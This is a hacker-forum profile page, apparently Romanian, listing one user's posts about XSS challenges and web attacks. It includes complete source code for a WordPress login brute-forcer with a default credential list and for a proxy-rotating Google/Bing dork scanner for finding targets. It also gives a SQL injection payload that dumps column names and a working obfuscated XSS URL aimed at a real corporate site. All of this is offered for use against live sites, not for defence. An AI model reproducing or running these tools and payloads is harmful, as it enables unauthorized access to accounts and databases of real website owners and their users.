Jump to content

dancezar

Active Members
  • Posts

    981
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by dancezar

  1. Vurnerabilitate reparata. Am facut un "video" inainte de a fi reparat.Desi am publicat si la vip odata,m-am gandit sa il postez si public. Vector: aa';alert(1);a=' Scuzati calitatea de cacat a video-ului dar l-am facu pe graba si am tot zis ca fac altu da am uitat. //Scuze de dublu post
  2. Bravo trimitemi te rog rezolvarea pe pm ca sa te trec pe lista.
  3. Target:-->XSS Challenge<-- Parametru:?a= Target:Executati javascript si afisati un mesaj de alerta nu prompt nu confirm Regului: -Nu dati hinturi nu cereti hinturi -Postati o poza cenzurata -Trimiteti link-ul pe pm Proof: http://s12.postimg.org/5w9imvgql/xss_ch.png Multumiri lui florin-dark pentru gazduire. Solveri: -0x39 -askwrite -
  4. Acesta este un mic dork scanner scris in Js/php care se foloseste de serviciul de cautare bing.Am incercat pe cateva dorkuri si scote destul de bine.In cazul in care bing va blocheaza ,decomentati linia 6 si eventual schimbati proxy-ul. index.html <html> <head> <title>Bing dorks extractor</title> </head> <body> <label>Dork: </label><input type="text" id="dk" /><br> <label>Dump file:</label><input type="text" id="df" /><br> <label>Service: </select><select id="sel"><option>Google</option><option>Bing</option></select> <br> <input type="button" id="btn" value="Scan" onclick="if(this.value=='Scan'){scaneaza();this.value='Stop';}else if(this.value=='Stop'){this.value='Scan';work=0;}else if(this.value='Continue'){work=1;go(contor);this.value='Stop';}" /> <div id="r"></div> <div id="ar"></div> <script> var drk=document.getElementById('dk'); var opt=document.getElementById('sel'); var contor; var pagina; var dork; var total; var work; var file=document.getElementById('df'); var area=document.getElementById('ar'); var c1=document.getElementById('r'); xmlhttp = new XMLHttpRequest(); function go(c){ if(opt.value=='Google'){ if(file.value!="") xmlhttp.open("GET", "get.php?t=google&dk="+encodeURIComponent(dork)+"&cont="+c+"&file="+file.value, true); else xmlhttp.open("GET", "get.php?t=google&dk="+encodeURIComponent(dork)+"&cont="+c+"&file=", true); }else{ if(file.value!="") xmlhttp.open("GET", "get.php?t=bing&dk="+encodeURIComponent(dork)+"&cont="+c+"&file="+file.value+"&pag="+pagina, true); else xmlhttp.open("GET", "get.php?t=bing&dk="+encodeURIComponent(dork)+"&cont="+c+"&file="+"&pag="+pagina, true); } xmlhttp.overrideMimeType('text/html; charset=UTF-8'); xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == 4) { parse(); } } xmlhttp.send(null) } function scaneaza(){ if(opt.value=="Google"){ dork=drk.value; pagina=-1; contor=1; work=1; go(contor); }else{ dork=drk.value; pagina=1; contor=1; total=111111111111111; work=1; go(contor); } } function parse(){ sursa=xmlhttp.responseText; if(opt.value=="Google"){ if(sursa.search("- did not match any documents.")>-1){ alert('Gata!'); }else if(sursa.search("blockedblockedblockedblockedblockedblockedblocked")>-1){ alert('Blocat!'); }else{ if(pagina==-1){ total=parseInt(sursa); go(contor); contor=1; pagina=1; }else{ if(pagina<total){ if(pagina==1) contor=10; else contor=contor+10; pagina++; c1.innerHTML="Pagina "+pagina+" din "+total; s=sursa.split(","); for(i=0;i<s.length;i++) area.innerHTML=area.innerHTML+s[i]+"<br>"; go(contor); } } } }else{ if(work==1){ if(pagina<total){ if(sursa.search("blockedblockedblockedblockedblockedblockedblocked")>-1){ alert('Blocat!'); work=0; document.getElementById('btn').value='Continue'; }else{ if(pagina==1){ total=sursa.split("<!--AllContent"); total=total[1].split("--"); total=(parseInt(total)/10)+1; s=sursa.replace("<!--AllContent"+total+"--"+">"); } s=sursa.split(","); for(i=0;i<s.length;i++) area.innerHTML=area.innerHTML+s[i]+"<br>"; contor=contor+10; pagina++; c1.innerHTML="Pagina "+pagina+" din "+total; go(contor); } }else{ alert('Gata'); document.getElementById('btn').value='Start'; work=0; } } } } </script> </body> </html> get.php <?php session_start(); if($_REQUEST['t']=='google'){ if(!isset($_SESSION['prox'])) $_SESSION['prox']=0; $proxy=array("nimic","217.12.113.67:443","222.124.198.136:3129","91.214.200.45:8080"); $useragent = "Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.14912/870; U; id) Presto/2.4.15"; if($_REQUEST['cont']==1){ $data=file_get_contents("http://www.google.com/search?hl=en&tbo=d&site=&source=hp&q=".urlencode($_REQUEST['dk'])); $split=explode('<div class="sd" id="resultStats">About ',$data); $split=explode(' results',$split[1]); echo ((int)str_replace(",","",$split[0])/10); }else{ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL, "http://www.google.com/search?hl=en&tbo=d&site=&source=hp&q=".urlencode($_REQUEST['dk'])."&start=".$_REQUEST['cont']); //curl_setopt($ch, CURLOPT_PROXY,"217.12.113.67:443"); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $output = curl_exec ($ch); curl_close($ch); if(strpos($output,"To continue, please type the characters below:")!=false){ $_SESSION['prox']=(int)$_SESSION['prox']+1; echo $_SESSION['prox']; echo 'blockedblockedblockedblockedblockedblockedblocked'; exit; } $split=explode('<div style="clear:both"><a href="/url?q=',$output); for($i=1;$i<count($split);$i++) { $aux=explode("&sa=U",$split[$i]); echo urldecode($aux[0])."<br>"; } } }else{ if(!isset($_SESSION['pro'])) $_SESSION['pro']=0; function start(){ $useragent=array("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11","Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7","Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))","Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"); $proxy=array("217.12.113.67:443","222.124.198.136:3129","91.214.200.45:8080"); if($_REQUEST['pag']=="1") $url="http://www.bing.com/search?q=".urlencode($_REQUEST['dk'])."&qs=n&form=QBLH&pq=".urlencode($_REQUEST['dk'])."&sc=0-5&sp=-1&sk="; else{ if($_REQUEST['pag']=="2") $url="http://www.bing.com/search?q=".urlencode($_REQUEST['dk'])."&qs=n&pq=".urlencode($_REQUEST['dk'])."&sc=0-5&sp=-1&sk=&first=11&FORM=PERE"; else $url="http://www.bing.com/search?q=".urlencode($_REQUEST['dk'])."&qs=n&pq=".urlencode($_REQUEST['dk'])."&sc=0-0&sp=-1&sk=&first=".$_REQUEST['cont']."&FORM=PERE".$_REQUEST['pag']; } $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_PROXY,$proxy[(int)$_SESSION['pro']]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 200); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_MAXREDIRS, 2); curl_setopt($ch, CURLOPT_USERAGENT,$useragent[rand(0,count($useragent)-1)]); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data1 = curl_exec($ch); curl_close($ch); $data1=str_replace(",","",$data1); return $data1; } //".urlencode($_REQUEST['dk'])." cont= $data=start(); if(strpos($data,"Bad Request")!=false||strpos($data,"Pardon the interruption")!=false){ echo 'blockedblockedblockedblockedblockedblockedblocked'; $s=(int)$_SESSION['pro']; if($s<(count($proxy)-1)) $_SESSION['pro']=(int)$_SESSION['pro']+1; exit; } //$split=explode('',$data); if($_REQUEST['cont']=="1"){ $split=explode('<span class="sb_count" id="count">',$data); $split=explode(' results',$split[1]); echo '<!--AllContent'.$split[0].'-->'; } $split=explode('<div class="sb_tlst"><h3><a href="',$data); if($_REQUEST['file']!="") $f=fopen($_REQUEST['file'],'a'); for($i=1;$i<count($split);$i++) { $aux=explode('"',$split[$i]); if($_REQUEST['file']!="") fwrite($f,strip_tags(urldecode($aux[0]))."\r\n"); echo strip_tags(urldecode($aux[0])).","; } if($_REQUEST['file']!="") fclose($f); } ?> In a doua casuta puteti scrie numele unui fisier unde se vor adauga datele dupa ce au fost extrase. Daca aveti buguri/sugestii nu ezitati sa dati un pm. Seara buna //Am facut modificari puteti sa va adaugati lista cu proxy-uri in array-u $proxy
  5. Mi se pare mie sau in primul video tu ai scris alert(1) si a sarit alert(/xss/)? //La al meu deabea acum dupa cateva luni am primit mesaj ca nu au inteles ce vector am bagat intr-un video demo si dupa ce le-am dat vectoru am primit mesaj ca lucreaza la repararea acestuia
  6. http://www.gm.com/content/gmcom/home/toolbar/search.html?q=--%3E%3Ch3%1C%1C/oncopy=%27ab=this.id%2bthis.title%2bthis.lang;\u006cocation=ab%27%1C/id=%27javascript%27%1C%1C/lang=%27rt%25281%2529%27%1C/title=%27:ale%27%1C/color=%27red%27%3EMUIE%20STRON%1CGBOY%3C/h3%3E Copy:MUIE+STRONGBOY I admit was hard as shit this challenge ,this take's me 3 hours but was aswome. Views: 301 Solvers:1. AHAHAHAHAHAH. Muie strongboy
  7. http://oi44.tinypic.com/15n5bpk.jpg Fain:D
  8. pl baga si tu scriptu pe altceva
  9. http://postimg.org/image/t32vdo0kt/d80a034e/ Ms.
  10. Ieri seara am facut un wp-bruteforce simplu folosind Javascript si putin php(doar pentru cURL) si m-am gandit sa il impart cu voi:D. index.html (asta face tot:) ) <label>Url:</label><input type="text" id="u" /><br> <label>Single user:</label><input type="text" id="s" /><input type="checkbox" id="single" /> <input type="button" value="GO!" onclick="if(this.value=='GO!'){start();this.value='Stop';}else{work=0;this.value='GO!';}" /> <div id="st"></div> <script> var users=Array("admin" ,"user" ,"sysadmin" ,"system" ,"administrator" ,"blog" ,"webmaster" ); var pass=Array("123456" ,"pa$$word" ,"admin" ,"admin123" ,"administrator" ,"qwerty" ,"qwerty1234" ,"andrei123" ); var url=document.getElementById('u').value; var sa=document.getElementById('st'); var single_user; var contor_user; var contor_pass; var total_u; var total_p; var work; var cont_incercari; http=new XMLHttpRequest(); function start(){ single_user="-"; cont_incercari=0; contor_user=0; contor_pass=0; total_u=users.length; total_p=pass.length; work=1; if(document.getElementById('single').checked){ single_user=document.getElementById('s').value; make_get(single_user,pass[0]); }else{ make_get(users[0],pass[0]); } } function make_get(user,pass){ http.open("GET", "get.php?url="+url+"&user="+user+"&pass="+pass, true); http.overrideMimeType('text/html; charset=UTF-8'); http.onreadystatechange = function() { if (http.readyState == 4) { trateaza(); } } http.send(null); } function trateaza(){ sursa=http.responseText; if(work==1){ if(sursa.search("<strong>ERROR</strong>")>-1){ if(single_user!="-"){ if(contor_pass<total_p){ contor_pass++; cont_incercari++; sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+total_p; make_get(single_user,pass[contor_pass]); }else{ alert("Stop"); work=0; } }else{ if(contor_pass<total_p){ contor_pass++; cont_incercari++; }else if(contor_user<total_u){ contor_pass=0; contor_user++; cont_incercari++; }else{ alert("Stop"); work=0; } sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+(total_p*total_u); make_get(users[contor_user],pass[contor_pass]); } }else{ //got him!! alert(users[contor_user]+"::"+pass[contor_pass]); } } } </script> get.php <?php $curl = curl_init($_REQUEST['url'].'/wp-login.php'); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_COOKIEJAR,"c.txt"); curl_setopt($curl,CURLOPT_COOKIEFILE,"c.txt"); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS,"log=".$_REQUEST['user']."&pwd=".$_REQUEST['pass']."&wp-submit=Log+In&redirect_to=".$_REQUEST['url']."/wp-admin/&testcookie=0"); $a = curl_exec($curl); echo $a; ?> Pentru un anumit user completati Single user: si bifati casuta. l-am testat pe firefox ultima versiune cred. Seara buna.
  11. Xss-u inca merge am sa postez un video atunci cand v-a fi reparat
  12. Where i can send the syntax? PS:not so hard maybe medium. Thanks for the challenge //vad ca a luat ban de ce?
  13. M-am saturat de hexat ,mersi de challenge sarbatori fericite.
  14. Ms:D de ce toti alegeti situ ala:))
  15. Nu mai fa dublu post nu e mess aici. Pentru ce ai tu nevoie se numeste DUMP IN ONE SHOT (select @ from(select @:=0x00,(select 0 from information_schema.columns where table_name=0xtable AND @ in (@:=concat(@,column_name,0x2c))))x) Exemplu : and 0 union select 1,2, (select @ from(select @:=0x00,(select 0 from information_schema.columns where table_name=0xtable AND @ in (@:=concat(@,column_name,0x2c))))x),4+--+
  16. vezi ca e cu ' in fata ' order by 1+--+
  17. ahahahahah=))) Nu e ala u va panicati:))
  18. Ms Normal Google applications
  19. Target:.google.com Type: Cross site scripting Reflected Tested on: -Chrome -Mozzila Proof: http://s24.postimg.org/urb2eyktw/google.jpg Status: - raportat am primit mesaju automat astept raspuns - is in vacanta cei de la google astept sa il repare
  20. Cerinta e foarte clara Trebuie sa faceti un vector sa functioneze in acelasi timp pe IE 8 si Chrome
  21. IMMORTALIS: CUM SA DEVII VAMPIR :
  22. me ,akkilion,Fox we just did it why is impossible?
  23. E bine trebuie user interaction dar merge
  24. al doilea este suspedat
  25. Target:htxp://www.getmeontop.com/search.php?query=&search=1 Dificultate:Easy Tasks: -Trebuie sa faceti un vector sa functioneze in acelasi timp pe IE 8 si Chrome Reguli: -Nu dati hinturi -Postati o imagine cenzurata cu cu cele 2 browsere -Trimiteti sintaxa prin PM Proof: Chrome: http://s21.postimg.org/o43oqrn3b/xss_ch_ch.png Ie: http://s8.postimg.org/6ft1coylw/xss_ch_ch2.jpg Solveri: - akkiliON - FoxKids - - - - -
×
×
  • Create New...